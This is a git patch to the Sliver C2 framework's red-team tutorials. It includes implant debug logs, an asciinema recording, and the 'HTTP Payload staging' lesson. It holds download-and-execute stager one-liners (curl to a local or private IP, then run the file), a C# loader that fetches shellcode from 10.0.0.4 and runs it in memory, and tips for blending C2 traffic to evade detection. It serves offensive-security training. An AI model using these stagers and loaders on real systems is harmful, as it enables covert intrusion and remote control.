"\u001b[214D\u001b[18C\u001b[0J\u001b[214D\r\r\n"] +[71.189909, "o", "\u001b[0 q\r\n"] +[71.233957, "o", " Name Implant Type Template OS/Arch Format Command & Control Debug C2 Config ID Stage \r\n================== ===================== ========== ============= ============ ======================= ======= =========== ======= =======\r\n POWERFUL_DEBT gzip - RC4 - beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 54907 true \r\n SOFT_OWNER beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 42203 false \r\n VISITING_PERFUME zlib - beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 3383 false \r\n WHOLE_BASE RC4 - beacon sliver linux/amd64 EXECUTABLE [1] https://localhost true ruby 20201 true \r\n"] +[71.234688, "o", "\r\n\r\n\r\n"] +[71.243691, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[71.243812, "o", "\u001b[1 q\u001b[?25l\u001b[214D"] +[71.243867, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[71.245282, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[71.245753, "o", "\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[73.381589, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[73.38348, "o", "\u001b[6n"] +[73.386558, "o", "e\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[73.551089, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[73.557629, "o", "ex\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[73.560272, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[73.667488, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[73.674901, "o", "exi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[73.676022, "o", "\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[73.823702, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[73.830817, "o", "\u001b[1m\u001b[32mexit\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[73.833105, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[74.083867, "o", "\u001b[13D\u001b[9C\u001b[6n"] +[74.093618, "o", "\u001b[214D"] +[74.09526, "o", "\u001b[13C\u001b[0J\u001b[214D\r\r\n"] +[74.098608, "o", "\u001b[0 q\r\n"] +[74.116094, "o", "Exiting...\r\n"] +[74.161362, "o", "\u001b[?2004h"] +[74.161518, "o", "root@98df0494f659:~# "] +[74.93344, "o", "\u001b[?2004l\r\r\n"] +[74.938604, "o", "exit\r\n"] From fb1e59ef5ae06bc1511ec1249a2c8e0fc53e538c Mon Sep 17 00:00:00 2001 From: Tim Makram Ghatas <47985652+TimBF@users.noreply.github.com> Date: Sat, 4 May 2024 09:48:46 +0200 Subject: [PATCH 5/7] update http payload staging tutorial --- docs/sliver-docs/nohup.out | 54 ++++++ .../tutorials/md/4 - HTTP Payload staging.md | 168 +----------------- docs/sliver-docs/public/tutorials.json | 2 +- 3 files changed, 60 insertions(+), 164 deletions(-) create mode 100644 docs/sliver-docs/nohup.out diff --git a/docs/sliver-docs/nohup.out b/docs/sliver-docs/nohup.out new file mode 100644 index 0000000000..afaa8899b6 --- /dev/null +++ b/docs/sliver-docs/nohup.out @@ -0,0 +1,54 @@ +2024/05/03 14:11:58 sliver.go:90: Hello my name is HIGH_EXTERNAL +2024/05/03 14:11:58 limits.go:58: Limit checks completed +2024/05/03 14:11:58 sliver.go:108: Running in session mode +2024/05/03 14:11:58 session.go:67: Starting interactive session connection loop ... +2024/05/03 14:11:58 transports.go:41: Starting c2 url generator () ... +2024/05/03 14:11:58 transports.go:104: Return generator: (chan *url.URL)(0xc0000966c0) +2024/05/03 14:11:58 transports.go:92: Yield c2 uri = 'https://localhost' +2024/05/03 14:11:58 transports.go:92: Yield c2 uri = 'https://localhost' +2024/05/03 14:11:58 session.go:84: Next CC = https://localhost +2024/05/03 14:11:58 session.go:84: Next CC = https://localhost +2024/05/03 14:11:58 transports.go:92: Yield c2 uri = 'https://localhost' +2024/05/03 14:11:58 session.go:172: Connecting -> http(s)://localhost +2024/05/03 14:11:58 provider_darwin.go:145: [proxy.Provider.readDarwinNetworkSettingProxy]: https proxy is not enabled. +2024/05/03 14:11:58 httpclient.go:873: [http] segments = [authenticate auth authenticate auth], filename = index, ext = php +2024/05/03 14:11:58 httpclient.go:354: [http] POST -> https://localhost/authenticate/auth/authenticate/auth/index.html?q=78232565492 (266 bytes) +2024/05/03 14:11:58 httpclient.go:360: [http] http response error: Post "https://localhost/authenticate/auth/authenticate/auth/index.html?q=78232565492": dial tcp [::1]:443: connect: connection refused +2024/05/03 14:11:58 provider_darwin.go:145: [proxy.Provider.readDarwinNetworkSettingProxy]: https proxy is not enabled. +2024/05/03 14:11:58 httpclient.go:873: [http] segments = [v1 authenticate authenticate], filename = register, ext = php +2024/05/03 14:11:58 httpclient.go:354: [http] POST -> http://localhost/v1/authenticate/authenticate/register.html?a=267051467451 (266 bytes) +2024/05/03 14:11:58 httpclient.go:403: [http] New session id: f1f551818cd5f7f3958caac2b091425a +2024/05/03 14:11:58 sliver.go:288: Host Uuid: c6de1a44-016a-5fbe-b76a-da56af41316d +2024/05/03 14:11:58 tun.go:53: [tunnel] Tunnel handlers map[20:0x57fdde0 22:0x57fb5a0 23:0x57fa7a0 80:0x57fc200 82:0x57ffac0 125:0x5801a20] +2024/05/03 14:11:58 session.go:189: [http] send envelope ... +2024/05/03 14:11:58 httpclient.go:873: [http] segments = [script script bundles], filename = route, ext = js +2024/05/03 14:11:58 httpclient.go:421: [http] GET -> http://localhost/script/script/bundles/route.js?j=20150g3730272 +2024/05/03 14:11:58 httpclient.go:873: [http] segments = [authenticate auth v1 v1], filename = index, ext = php +2024/05/03 14:11:58 httpclient.go:498: [http] POST -> http://localhost/authenticate/auth/v1/v1/index.php?l=363491c102551 (291 bytes) +2024/05/03 14:11:58 httpclient.go:504: [http] POST request completed +2024/05/03 14:12:01 httpclient.go:304: Cancelling poll context +2024/05/03 14:12:01 httpclient.go:873: [http] segments = [javascripts bundles script], filename = app, ext = js +2024/05/03 14:12:01 httpclient.go:421: [http] GET -> http://localhost/javascripts/bundles/script/app.js?i=633022582114 +2024/05/03 14:12:03 httpclient.go:304: Cancelling poll context +2024/05/03 14:12:03 httpclient.go:873: [http] segments = [javascripts script], filename = app, ext = js +2024/05/03 14:12:03 httpclient.go:421: [http] GET -> http://localhost/javascripts/script/app.js?d=40n0813096227 +2024/05/03 14:12:05 httpclient.go:304: Cancelling poll context +2024/05/03 14:12:05 httpclient.go:873: [http] segments = [javascripts script bundles], filename = route, ext = js +2024/05/03 14:12:05 httpclient.go:421: [http] GET -> http://localhost/javascripts/script/bundles/route.js?j=1w00262k790643 +2024/05/03 14:12:07 httpclient.go:304: Cancelling poll context +2024/05/03 14:12:07 httpclient.go:873: [http] segments = [javascripts bundles], filename = app, ext = js +2024/05/03 14:12:07 sliver.go:198: [recv] sysHandler 12 +2024/05/03 14:12:07 httpclient.go:421: [http] GET -> http://localhost/javascripts/bundles/app.js?t=407557639s971 +2024/05/03 14:12:07 session.go:189: [http] send envelope ... +2024/05/03 14:12:07 httpclient.go:873: [http] segments = [authenticate rest], filename = rpc, ext = php +2024/05/03 14:12:07 httpclient.go:498: [http] POST -> http://localhost/authenticate/rest/rpc.php?c=15m4230363028 (121 bytes) +2024/05/03 14:12:07 httpclient.go:504: [http] POST request completed +2024/05/03 14:12:09 httpclient.go:304: Cancelling poll context +2024/05/03 14:12:09 httpclient.go:873: [http] segments = [script scripts script bundles], filename = route, ext = js +2024/05/03 14:12:09 httpclient.go:421: [http] GET -> http://localhost/script/scripts/script/bundles/route.js?f=364809635s50 +2024/05/03 14:12:11 httpclient.go:304: Cancelling poll context +2024/05/03 14:12:11 httpclient.go:873: [http] segments = [javascripts bundles javascripts], filename = route, ext = js +2024/05/03 14:12:11 httpclient.go:421: [http] GET -> http://localhost/javascripts/bundles/javascripts/route.js?t=631v134417400 +2024/05/03 14:12:11 sliver.go:177: [recv] specialHandler 4 +2024/05/03 14:12:11 session.go:164: [http] Stop() +2024/05/03 14:12:11 session.go:155: [http] lost connection, cleanup... diff --git a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md index c65f47aa0d..d811578a9b 100644 --- a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md +++ b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md @@ -36,171 +36,13 @@ Sliver staging also supports encoding or encrypting our payloads before exposing {"src": "/asciinema/stage_compress_encrypt.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} ``` +A simple stager could look like this for example in Linux: -## Metasploit - -You can generate msfvenom shellcode to connect back to our stage listener and retrieve the second stage payload, however you’ll need to include the `--prepend-size` argument to the stage listener as Metasploit payloads require the length to be prepended to the stage. You can either kill the previous stage listener using the `jobs -k` command or run the stage listener on a different port: - -```html -[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7202 --profile profile1 --prepend-size - -[*] Sliver name for profile: IDEAL_THRONE -[*] Job 2 (http) started ``` - -Once you have the stage listener setup with prepend size, you can generate the stager shellcode: - -```bash -[server] sliver > generate stager --lhost **%%LINUX_IPADDRESS%%** --lport 7202 --protocol http --save /tmp --format c - -[*] Sliver implant stager saved to: /tmp/HOLLOW_CHINO +curl http://localhost/nothingtoseehere.yml?c=1234 --output nothingtoseehere && chmod u+x nothingtoseehere &&nohup ./nothingtoseehere ``` -Create a new file on the Linux box with the following contents and replace the `%%STAGE_SHELLCODE%%` field with the shellcode previously created: - -```bash -#include "windows.h" - -int main() -{ - unsigned char buf[] = **%%STAGE_SHELLCODE%%** ; - void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - memcpy(exec, buf, sizeof buf); - ((void(*)())exec)(); - - return 0; -} +Or on Windows: ``` - -Finally compile the payload. - -```bash -x86_64-w64-mingw32-gcc -o stage.exe stager.c -``` - -Once the executable is copied over to a windows host and run you should see a session connect back to your host. - -## Custom stager - -You can also use a custom stager that just retrieves sliver shellcode directly and loads it in memory similarly to the previous stager. - -```bash -using System; -using System.Net.Http; -using System.Runtime.InteropServices; -using System.Threading.Tasks; - -namespace ConsoleApp1 -{ - internal class Program - { - [DllImport("kernel32.dll")] - public static extern IntPtr VirtualAlloc( - IntPtr lpAddress, - uint dwSize, - AllocationType flAllocationType, - MemoryProtection flProtect); - - [DllImport("kernel32.dll")] - public static extern IntPtr CreateThread( - IntPtr lpThreadAttributes, - uint dwStackSize, - IntPtr lpStartAddress, - IntPtr lpParameter, - uint dwCreationFlags, - out IntPtr lpThreadId); - - [DllImport("kernel32.dll")] - public static extern bool VirtualProtect( - IntPtr lpAddress, - uint dwSize, - MemoryProtection flNewProtect, - out MemoryProtection lpflOldProtect); - - [DllImport("kernel32.dll")] - public static extern uint WaitForSingleObject( - IntPtr hHandle, - uint dwMilliseconds); - - [Flags] - public enum AllocationType - { - Commit = 0x1000, - Reserve = 0x2000, - Decommit = 0x4000, - Release = 0x8000, - Reset = 0x80000, - Physical = 0x400000, - TopDown = 0x100000, - WriteWatch = 0x200000, - LargePages = 0x20000000 - } - - [Flags] - public enum MemoryProtection - { - Execute = 0x10, - ExecuteRead = 0x20, - ExecuteReadWrite = 0x40, - ExecuteWriteCopy = 0x80, - NoAccess = 0x01, - ReadOnly = 0x02, - ReadWrite = 0x04, - WriteCopy = 0x08, - GuardModifierflag = 0x100, - NoCacheModifierflag = 0x200, - WriteCombineModifierflag = 0x400 - } - - static async Task Main(string[] args) - { - - byte[] shellcode; - - using (var handler = new HttpClientHandler()) - { - // ignore ssl, because self-signed - handler.ServerCertificateCustomValidationCallback = (message, cert, chain, sslPolicyErrors) => true; - - using (var client = new HttpClient(handler)) - { - // Download the shellcode - shellcode = await client.GetByteArrayAsync("http://10.0.0.4:7200/whatever.woff"); - } - } - - // Allocate a region of memory in this process as RW - var baseAddress = VirtualAlloc( - IntPtr.Zero, - (uint)shellcode.Length, - AllocationType.Commit | AllocationType.Reserve, - MemoryProtection.ReadWrite); - - // Copy the shellcode into the memory region - Marshal.Copy(shellcode, 0, baseAddress, shellcode.Length); - - // Change memory region to RX - VirtualProtect( - baseAddress, - (uint)shellcode.Length, - MemoryProtection.ExecuteRead, - out _); - - // Execute shellcode - var hThread = CreateThread( - IntPtr.Zero, - 0, - baseAddress, - IntPtr.Zero, - 0, - out _); - // Wait infinitely on this thread to stop the process exiting - WaitForSingleObject(hThread, 0xFFFFFFFF); - } - } -} -``` - -## References - -- [https://github.com/BishopFox/sliver/wiki/Stagers](https://github.com/BishopFox/sliver/wiki/Stagers) +curl http://172.20.10.3/test.woff?a=29178 -o t.exe && .\t.exe +``` \ No newline at end of file diff --git a/docs/sliver-docs/public/tutorials.json b/docs/sliver-docs/public/tutorials.json index 3da8b8253c..42cf904722 100644 --- a/docs/sliver-docs/public/tutorials.json +++ b/docs/sliver-docs/public/tutorials.json @@ -1 +1 @@ -{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"# Beacons vs Sessions\n\nSliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nWe will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`.\n\nWe will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way.\n\nWe will split the urls using a script like the example below, and then update the files and paths variables in our configuration file.\n\n```python\nimport json\nimport math\nimport sys\nimport random\n\n\ndef updateProfile(c2ProfileName, urls, cookieName):\n data = open(urls).readlines()\n c2Profile = open(c2ProfileName, \"r\").read()\n jsonC2Profile = json.loads(c2Profile)\n\n paths, filenames, extensions = [], [], []\n for line in data:\n line = line.strip()\n if \".\" in line:\n extensions.append(line.split(\".\")[-1])\n\n if \"/\" in line:\n segments = line.split(\"/\")\n paths.extend(segments[:-1])\n filenames.append(segments[-1].split(\".\")[0])\n\n extensions = list(set(extensions))\n if \"\" in extensions:\n extensions.remove(\"\")\n random.shuffle(extensions)\n\n filenames = list(set(filenames))\n if \"\" in filenames:\n filenames.remove(\"\")\n\n paths = list(set(paths))\n if \"\" in paths:\n paths.remove(\"\")\n\n if len(extensions) < 5:\n print(f'Got {len(extensions)} extensions, need at least 5.')\n exit(0)\n\n if len(paths) < 5:\n print(f'Got {len(paths)} paths need at least 5.')\n exit(0)\n\n if len(filenames) < 5:\n print(f'Got {len(filenames)} paths need at least 5.')\n exit(0)\n\n exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ]\n for ext in exts:\n jsonC2Profile[\"implant_config\"][ext] = extensions[0]\n extensions.pop(0)\n\n pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ]\n for x, pathType in enumerate(pathTypes):\n jsonC2Profile[\"implant_config\"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))]\n\n fileTypes = ['poll_files','stager_files', 'session_files', 'close_files']\n for x, fileType in enumerate(fileTypes):\n jsonC2Profile[\"implant_config\"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))]\n\n jsonC2Profile[\"server_config\"][\"cookies\"] = [cookieName]\n c2Profile = open(c2ProfileName, \"w\")\n c2Profile.write(json.dumps(jsonC2Profile))\n print(\"C2 Profile updated !\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage: updateProfile.py myC2Profile myurls.txt cookieName\")\n exit(0)\n\n updateProfile(sys.argv[1], sys.argv[2], sys.argv[3])\n```\nThe example below demonstrates how to change and import a profile.\n\n```asciinema\n{\"src\": \"/asciinema/custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can generate a new implant using our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf we review the debug logs of our implant we can see that the connections now use our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_debug_logs.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \n\n"},{"name":"4 - HTTP Payload staging","content":"# Stagers\n\nWhen using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.\n\nFor this exercise we will create a new beacon profile and prepare to stage it.\n\n```asciinema\n{\"src\": \"/asciinema/create_profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf you look at the generated implant, you'll notice the `ID` field has been populated. When downloading your payload from the staging server your URL needs to be in the form of:\n```\nhttps://sliver-ip/whatever.stager_file_ext?x=yourID\n```\n\nThere is a lot of flexibility in the form of this URL, the conditions for successfull staging are:\n* the file extension needs to match the c2 profile's stager_file_ext\n* there has to be a one character http url parameter\n* the digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values\n\nTo exposed a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed.\n\n```asciinema\n{\"src\": \"/asciinema/stage_implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\n\n## Metasploit\n\nYou can generate msfvenom shellcode to connect back to our stage listener and retrieve the second stage payload, however you’ll need to include the `--prepend-size` argument to the stage listener as Metasploit payloads require the length to be prepended to the stage. You can either kill the previous stage listener using the `jobs -k` command or run the stage listener on a different port:\n\n```html\n[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7202 --profile profile1 --prepend-size\n\n[*] Sliver name for profile: IDEAL_THRONE\n[*] Job 2 (http) started\n```\n\nOnce you have the stage listener setup with prepend size, you can generate the stager shellcode:\n\n```bash\n[server] sliver > generate stager --lhost **%%LINUX_IPADDRESS%%** --lport 7202 --protocol http --save /tmp --format c\n\n[*] Sliver implant stager saved to: /tmp/HOLLOW_CHINO\n```\n\nCreate a new file on the Linux box with the following contents and replace the `%%STAGE_SHELLCODE%%` field with the shellcode previously created:\n\n```bash\n#include \"windows.h\"\n\nint main()\n{\n unsigned char buf[] = **%%STAGE_SHELLCODE%%** ;\n void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n memcpy(exec, buf, sizeof buf);\n ((void(*)())exec)();\n\n return 0;\n}\n```\n\nFinally compile the payload.\n\n```bash\nx86_64-w64-mingw32-gcc -o stage.exe stager.c\n```\n\nOnce the executable is copied over to a windows host and run you should see a session connect back to your host.\n\n## Custom stager\n\nYou can also use a custom stager that just retrieves sliver shellcode directly and loads it in memory similarly to the previous stager.\n\n```bash\nusing System;\nusing System.Net.Http;\nusing System.Runtime.InteropServices;\nusing System.Threading.Tasks;\n\nnamespace ConsoleApp1\n{\n internal class Program\n {\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr VirtualAlloc(\n IntPtr lpAddress,\n uint dwSize,\n AllocationType flAllocationType,\n MemoryProtection flProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr CreateThread(\n IntPtr lpThreadAttributes,\n uint dwStackSize,\n IntPtr lpStartAddress,\n IntPtr lpParameter,\n uint dwCreationFlags,\n out IntPtr lpThreadId);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool VirtualProtect(\n IntPtr lpAddress,\n uint dwSize,\n MemoryProtection flNewProtect,\n out MemoryProtection lpflOldProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern uint WaitForSingleObject(\n IntPtr hHandle,\n uint dwMilliseconds);\n\n [Flags]\n public enum AllocationType\n {\n Commit = 0x1000,\n Reserve = 0x2000,\n Decommit = 0x4000,\n Release = 0x8000,\n Reset = 0x80000,\n Physical = 0x400000,\n TopDown = 0x100000,\n WriteWatch = 0x200000,\n LargePages = 0x20000000\n }\n\n [Flags]\n public enum MemoryProtection\n {\n Execute = 0x10,\n ExecuteRead = 0x20,\n ExecuteReadWrite = 0x40,\n ExecuteWriteCopy = 0x80,\n NoAccess = 0x01,\n ReadOnly = 0x02,\n ReadWrite = 0x04,\n WriteCopy = 0x08,\n GuardModifierflag = 0x100,\n NoCacheModifierflag = 0x200,\n WriteCombineModifierflag = 0x400\n }\n\n static async Task Main(string[] args)\n {\n\n byte[] shellcode;\n\n using (var handler = new HttpClientHandler())\n {\n // ignore ssl, because self-signed\n handler.ServerCertificateCustomValidationCallback = (message, cert, chain, sslPolicyErrors) => true;\n\n using (var client = new HttpClient(handler))\n {\n // Download the shellcode\n shellcode = await client.GetByteArrayAsync(\"http://10.0.0.4:7200/whatever.woff\");\n }\n }\n\n // Allocate a region of memory in this process as RW\n var baseAddress = VirtualAlloc(\n IntPtr.Zero,\n (uint)shellcode.Length,\n AllocationType.Commit | AllocationType.Reserve,\n MemoryProtection.ReadWrite);\n\n // Copy the shellcode into the memory region\n Marshal.Copy(shellcode, 0, baseAddress, shellcode.Length);\n\n // Change memory region to RX\n VirtualProtect(\n baseAddress,\n (uint)shellcode.Length,\n MemoryProtection.ExecuteRead,\n out _);\n\n // Execute shellcode\n var hThread = CreateThread(\n IntPtr.Zero,\n 0,\n baseAddress,\n IntPtr.Zero,\n 0,\n out _);\n // Wait infinitely on this thread to stop the process exiting\n WaitForSingleObject(hThread, 0xFFFFFFFF);\n }\n }\n}\n```\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Stagers](https://github.com/BishopFox/sliver/wiki/Stagers)\n"},{"name":"5 - Pivots","content":"# Pivots\n\nPivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.\n\nSliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.\n\nIn both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > pivots tcp\n\n[*] Started tcp pivot listener :9898 with id 1\n\n[server] sliver (INNER_GO-KART) > pivots\n\n ID Protocol Bind Address Number Of Pivots\n==== ========== ============== ==================\n 1 TCP :9898 0\n```\n\nThe listening port and interface can be configured during creation.\n\nThe next step is to generate a payload that will connect to our 